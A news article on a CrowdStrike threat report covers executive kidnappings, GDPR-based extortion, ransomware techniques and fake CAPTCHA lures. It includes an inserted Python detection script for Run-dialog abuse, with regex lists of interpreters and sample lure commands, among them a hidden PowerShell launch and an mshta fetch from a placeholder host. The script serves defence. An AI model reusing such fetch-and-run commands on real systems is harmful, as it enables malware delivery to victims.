While tracking cyberattacks since last year, a CrowdStrike report also found that physical attacks and kidnappings have increased dramatically, particularly in Europe.
“In January 2025, threat actors kidnapped and attempted to extort the co-founder of Ledger, a prolific cryptocurrency wallet vendor, in France,” the CrowdStrike report said. “Although the threat actors in this case and numerous others have been arrested, the threat persists. Between January 2025 and September 2025, 17 similar incidents occurred in Europe, 13 of which occurred in France.”
Cybersecurity consultants said that they have been hearing similar reports of increased violence to gain system access for quite some time.
“I am seeing both an increase in the use of cyberattacks as a distraction for real world thefts and attacks, and the combined use of cyber and physical means to achieve criminal objectives. It is giving a new meaning to ‘brute force’ attacks,” said cybersecurity consultant Brian Levine, a former federal prosecutor who today serves as executive director of FormerGov, a directory of former government and military specialists. “As a result, both organizations and individuals are already deepening their focus on physical security and executive security. Playbooks for cyber should explicitly encourage the team to consider whether the incident they are addressing may be, in whole or in part, a distraction for some other type of attack.”
Art Cooper, the principal security consultant at TrustedSec, said his key, albeit flippant, recommendation for executives who could be physically threatened by criminals trying to gain data access is, “Get a shotgun.”
Cooper said that part of the problem is the typically loose way in which many European and American enterprises handle physical security, compared with, for example, enterprises in India.
He said Indian enterprises typically have multi-layered physical security around key buildings, with different security firms handling different layers. When someone enters, he said, they are typically asked to submit all electronic devices for inspection, where guards record all serial numbers. As the visitor moves deeper into the building, other security teams, working for other security companies, inspect those devices and capture the serial numbers again.
However, he has started seeing enterprises in China and Japan embracing the lax methods practiced by Americans. “Asian society is starting to be just as bad as Western,” Cooper said.
Noted Flavio Villanustre, SVP and CISO for LexisNexis Risk Solutions: “Physical violence as a service, such as kidnapping, is taking things to a different level, where criminals don’t seem to care much about losing the veil of anonymity protection that the internet gives them.”
Key targets
The CrowdStrike report detailed some of the global patterns for attack prevalence.
“Entities in Europe are more than twice as likely to be targeted than entities in the Asia Pacific and Japan region,” the report said, adding that the European Union’s GDPR is one of the reasons. “Threat actors have leveraged GDPR data breach penalties to pressure victims into paying ransoms. Several threat actors have threatened to report entities for regulatory noncompliance via their data leak sites, in ransom notes, or during negotiations.”
The report highlighted various statistical attack patterns, including the most targeted verticals (manufacturing, professional services, technology, industrials and engineering, and retail) and the most popular attack methods, including, it said, “Dumping credentials from backup and restore configuration databases, which often store credentials used to access hypervisor infrastructure; remotely encrypting files, executing ransomware, often from an unmanaged system, and running the file encryption process outside of the targeted system; leveraging access to unmanaged systems to steal data and deploy ransomware; and deploying Linux ransomware on VMware ESXi infrastructure.”
Another increasingly popular attack vector, the report said, is creating fake CAPTCHA lures to deliver malware. “This social engineering technique involves using pages that imitate CAPTCHA authentication tests to convince victims to copy, paste, and execute malicious code into the Windows Run dialog box or terminal. Identified campaigns used phishing emails, malicious advertising (malvertising), and search engine optimization (SEO) poisoning to direct targets to fake CAPTCHA pages.”
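One way to triage hosts for the paste-into-Run technique described above, added here as an example and not taken from the CrowdStrike report: Explorer records Run-dialog commands in the user's RunMRU registry key, and the code below scans an export of that key for interpreter launches that also carry CAPTCHA decoy text, a URL or a hidden-window flag. The indicator patterns, function names and sample values are assumptions constructed for illustration.

```python
import re

# Indicators are assumptions chosen for this example, not a vetted rule set.
INTERPRETER = re.compile(
    r"^\s*\"?(?:[^\"\s]*\\)?(?:powershell|pwsh|cmd|mshta|wscript|cscript|"
    r"curl|certutil|msiexec|rundll32)(?:\.exe)?\b", re.I)
REMOTE = re.compile(r"https?://", re.I)
DECOY = re.compile(r"captcha|not a robot|verif(?:y|ication)", re.I)
# Covers only the "-w hidden" and "-WindowStyle hidden" spellings.
HIDDEN = re.compile(r"\s-w(?:indowstyle)?\s+hidden\b", re.I)


def score(command):
    """Return the indicators present in one Run-dialog command line."""
    checks = [("interpreter", INTERPRETER), ("remote-url", REMOTE),
              ("captcha-decoy-text", DECOY), ("hidden-window", HIDDEN)]
    return [name for name, rx in checks if rx.search(command)]


def triage_runmru(values):
    """values: RunMRU value name -> data, as exported from
    HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU.
    Returns (command, indicators), most recent first, for entries that launch
    an interpreter and carry at least one further indicator."""
    hits = []
    for name in values.get("MRUList", ""):  # MRUList holds recency order
        data = values.get(name)
        if data is None:
            continue
        # Explorer appends "\1" to each stored command.
        command = data[:-2] if data.endswith("\\1") else data
        indicators = score(command)
        if "interpreter" in indicators and len(indicators) > 1:
            hits.append((command, indicators))
    return hits


# Constructed sample export; example.invalid and the payload are placeholders.
SAMPLE = {
    "MRUList": "dcba",
    "a": "cmd\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -c "<placeholder>" # I am not a robot\\1',
    "d": "mshta https://example.invalid/verify # reCAPTCHA ID 0000\\1",
}

if __name__ == "__main__":
    for command, indicators in triage_runmru(SAMPLE):
        print(indicators, "<-", command)
```

A hit only shows that a suspicious command was entered in the Run dialog; lures that direct the victim to a terminal instead leave no RunMRU entry and need process-creation logging to catch.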
Some criminal services have aggressively pushed specific capabilities as their own specialties, the report noted: “Advertised features included dynamically created code obfuscation, security bypass capabilities and decoy functionalities [such as] imitating cryptocurrency management platforms.”
Not surprisingly, the report found that the tradition of Russian attack groups avoiding victimizing Russian businesses and consumers is still very much in evidence.
“The prohibition on targeting organizations and citizens of Russia and Commonwealth of Independent States (CIS) countries has long been a tacit and often codified rule in the Russian-language underground ecosystem,” the report said. “Though this prohibition is likely rooted in an attempt to avoid domestic law enforcement, patriotism also likely plays a role, with CIS-based eCrime threat actors preferring to target external entities.”